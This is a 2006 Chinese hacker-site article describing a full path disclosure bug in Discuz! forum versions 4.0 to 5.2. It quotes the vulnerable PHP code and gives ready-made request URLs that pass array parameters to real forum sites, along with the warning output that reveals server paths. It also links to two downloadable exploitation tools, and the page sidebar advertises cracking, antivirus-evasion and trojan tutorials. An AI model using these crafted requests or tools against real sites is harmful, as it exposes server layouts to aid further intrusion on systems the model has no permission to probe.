黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图
您现在的位置: 黑客风云 >> 黑客文章 >> 黑客入门 >> 黑软介绍 >> 文章正文
[推荐]Discuz论坛爆物理路径原理+工具
      ★★★★★
Discuz论坛爆物理路径原理+工具
文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2006-11-28
一共有两个版本。一个vb.net 2005写的,需要.net环境,一个是DELPHI写的。
来源:火狐技术联盟
原理及发现:Zizzy

受影响版本
Discuz!5.2
Discuz!5.1
Discuz!4.1
Discuz!4.0
.............

1.common.inc.php问题代码207行
.....
$navtitle = $navigation = '';
$extra = isset($extra) && preg_match("/^[&=;a-z0-9]+$/i", $extra) ? $extra : '';
$tpp = intval(empty($_DSESSION['tpp']) ? $topicperpage : $_DSESSION['tpp']);
$ppp = intval(empty($_DSESSION['ppp']) ? $postperpage : $_DSESSION['ppp']);
.......

提交:
http://www.discuz.net/post.php?action=newthread&fid=32&extra[]=page%3D1
返回
Warning: preg_match() expects parameter 2 to be string, array given in

/home/www/wwwroot/www.discuz.net/include/common.inc.php on line 209

2.依然是extra数组的问题
提交

http://bbs.cnbct.org/viewthread.php?tid=316&pid=1453&page=1&extra[]=page%3D1#pid1453
Warning: preg_match() expects parameter 2 to be string, array given in

/home/.cattia/bct/bbs.cnbct.org/include/common.inc.php on line 206
?
Warning: Cannot modify header information - headers already sent by (output started at

/home/.cattia/bct/bbs.cnbct.org/include/common.inc.php:206) in

/home/.cattia/bct/bbs.cnbct.org/include/global.func.php on line 139

3.global.func.php问题代码306行
function ispage($number) {
return !empty($number) && preg_match ("/^([0-9]+)$/", $number);
}

提交:
http://www.discuz.net/viewthread.php?tid=316&pid=1453&page[]=1&extra=page%3D1#pid1453
返回
Warning: preg_match() expects parameter 2 to be string, array given in

/home/www/wwwroot/www.discuz.net/include/global.func.php on line 306


总结
当把变量当成数组提交时,如果不存在该数组,但存在变量,后面的preg_match()正则表达式匹配不了,这样就出现了绝对路径的泄露

利用工具:
discuz论坛爆绝对路径辅助利用工具(vb.net 2005写的)
作者:T4nk

下载:  discuz论坛爆绝对路径辅助利用工具

Discuz论坛物理路径爆破器(DELPHI写的)
作者:童童


下载: http://free5.ys168.com/?tongtong520

文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章:
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    抽根憋闷烟的心声
    学习网页制作的理由
    加入终身会员的理由!!!
    学习黑客编程的5大理由
    学习免杀的6大理由
    学习软件破解的理由
    会员账号开通查询
    常见问题解答
    汇款向导
    学员报名咨询
    最 新 热 门
    OllyDBG破解工具入门教程02-06
    3389密码的嗅探02-06
    防黑之阻断基于PcAnyWhere的攻击01-11
    取代NBSI2:Opendatasource And 01-08
    黑洞远程控制软件V1.0(黑洞200712-11
    远离QQ木马威胁!QQ医生新品试用12-07
    网络分析专家sniffer之流量扫描篇12-04
    病毒终结者 卡巴斯基6.0闪亮登场11-30
    Discuz论坛爆物理路径原理+工具11-28
    精品后门程序介绍及思路分板10-30
    IISPutScanner v1.0扫描入侵工具10-20
    通用php远程文件包含漏洞获取web10-16
    相 关 文 章
  • Forumable免费Discuz!论坛申请

  • 跨站通杀漏洞:支持最新的phpwind等论坛

  • 数据库连接池的原理机制

  • SEO工具汇总

  • Whois Source实用方便的网站域名查询工

  • QQ也做团队语音聊天工具:QQTalk试用

  • OllyDBG破解工具入门教程

  • 动网论坛(SQL版)后台注入

  • 木马免杀原理详解

  • 屏蔽WIN2000和XP以及2003的F8的原理与修

  • DNS欺骗原理与实现

  • 黑客非法探取密码的原理及安全防范

    • Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886